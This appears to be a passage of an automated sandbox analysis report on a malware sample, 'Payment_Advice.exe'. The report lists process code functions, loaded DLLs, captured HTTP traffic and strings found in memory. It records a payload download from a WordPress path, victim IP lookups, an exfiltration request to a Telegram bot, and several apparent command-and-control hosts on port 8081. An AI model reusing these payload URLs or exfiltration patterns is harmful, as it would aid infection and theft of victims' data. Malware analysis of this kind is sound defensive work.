Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 028BF2EDh |
5_2_028BF12B |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 028BFAA9h |
5_2_028BF804 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 028BF2EDh |
5_2_028BF33C |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 24492C21h |
5_2_24492970 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 244931E8h |
5_2_24492DD0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
5_2_24490040 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 2449E311h |
5_2_2449E068 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 2449DEB9h |
5_2_2449DC10 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 2449E769h |
5_2_2449E4C0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 2449F019h |
5_2_2449ED70 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 2449EBC1h |
5_2_2449E918 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 244931E8h |
5_2_24493116 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 2449F471h |
5_2_2449F1C8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 244931E8h |
5_2_24492DC7 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 2449FD21h |
5_2_2449FA78 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 2449F8C9h |
5_2_2449F620 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 2449D609h |
5_2_2449D360 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 2449D1B1h |
5_2_2449CF08 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 24490D0Dh |
5_2_24490B30 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 24491697h |
5_2_24490B30 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 4x nop then jmp 2449DA61h |
5_2_2449D7B8 |
Source: global traffic |
HTTP traffic detected: GET /wp-includes/QMHHyMk225.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?L |
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org |
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/ |
Source: powershell.exe, 00000002.00000002.2435366329.0000000007679000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://electromac.com.bo |
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://mail.electromac.com.bo |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr |
String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://r10.i.lencr.org/01 |
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://r10.o.lencr.org0# |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr |
String found in binary or memory: http://s.symcb.com/universal-root.crl0 |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr |
String found in binary or memory: http://s.symcd.com06 |
Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr |
String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0( |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr |
String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0 |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr |
String found in binary or memory: http://ts-ocsp.ws.symantec.com0; |
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://varders.kozow.com:8081 |
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://x1.c.lencr.org/0 |
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://x1.i.lencr.org/0 |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: wab.exe, 00000005.00000002.3299130843.000000002183E000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002182F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: wab.exe, 00000005.00000002.3299130843.0000000021839000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr |
String found in binary or memory: https://d.symcb.com/cps0% |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr |
String found in binary or memory: https://d.symcb.com/rpa0 |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr |
String found in binary or memory: https://d.symcb.com/rpa0. |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org |
Source: wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33 |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216FA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$ |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/ |
Source: wab.exe, 00000005.00000002.3299130843.000000002186A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/lB |
Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.reap.skyestates.com.mt/ |
Source: wab.exe, 00000005.00000002.3285487324.0000000005DA0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin |
Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binN |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Code function: 0_2_00404B0E |
0_2_00404B0E |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Code function: 0_2_0040653D |
0_2_0040653D |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 2_2_04E5EAD8 |
2_2_04E5EAD8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 2_2_04E5F3A8 |
2_2_04E5F3A8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 2_2_04E5E790 |
2_2_04E5E790 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 2_2_0799C4D6 |
2_2_0799C4D6 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028B5362 |
5_2_028B5362 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028BA088 |
5_2_028BA088 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028BC146 |
5_2_028BC146 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028BC738 |
5_2_028BC738 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028BC468 |
5_2_028BC468 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028BD599 |
5_2_028BD599 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028BCA08 |
5_2_028BCA08 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028BF804 |
5_2_028BF804 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028BCFAB |
5_2_028BCFAB |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028B6FC8 |
5_2_028B6FC8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028BCCD8 |
5_2_028BCCD8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028BEC18 |
5_2_028BEC18 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028B39EE |
5_2_028B39EE |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028B29EC |
5_2_028B29EC |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028B3E09 |
5_2_028B3E09 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028BEC0B |
5_2_028BEC0B |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_028BFC50 |
5_2_028BFC50 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_05BD2660 |
5_2_05BD2660 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_05BD55E0 |
5_2_05BD55E0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_05BDBF40 |
5_2_05BDBF40 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_05BD39BC |
5_2_05BD39BC |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24492970 |
5_2_24492970 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24492288 |
5_2_24492288 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24495290 |
5_2_24495290 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24491BA8 |
5_2_24491BA8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_244997B0 |
5_2_244997B0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24490040 |
5_2_24490040 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449E068 |
5_2_2449E068 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449E067 |
5_2_2449E067 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449DC01 |
5_2_2449DC01 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449DC10 |
5_2_2449DC10 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449003F |
5_2_2449003F |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449E4C0 |
5_2_2449E4C0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449E4BF |
5_2_2449E4BF |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24492963 |
5_2_24492963 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449ED70 |
5_2_2449ED70 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449E918 |
5_2_2449E918 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449E917 |
5_2_2449E917 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449F1C8 |
5_2_2449F1C8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24498DF9 |
5_2_24498DF9 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24499590 |
5_2_24499590 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449F1B9 |
5_2_2449F1B9 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24499E46 |
5_2_24499E46 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449FA78 |
5_2_2449FA78 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24492278 |
5_2_24492278 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24498E08 |
5_2_24498E08 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449F620 |
5_2_2449F620 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24499ED8 |
5_2_24499ED8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24495283 |
5_2_24495283 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449D360 |
5_2_2449D360 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449CF08 |
5_2_2449CF08 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24490B28 |
5_2_24490B28 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24490B30 |
5_2_24490B30 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_24491B97 |
5_2_24491B97 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 5_2_2449D7B8 |
5_2_2449D7B8 |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: shfolder.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: riched20.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: usp10.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: msls31.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
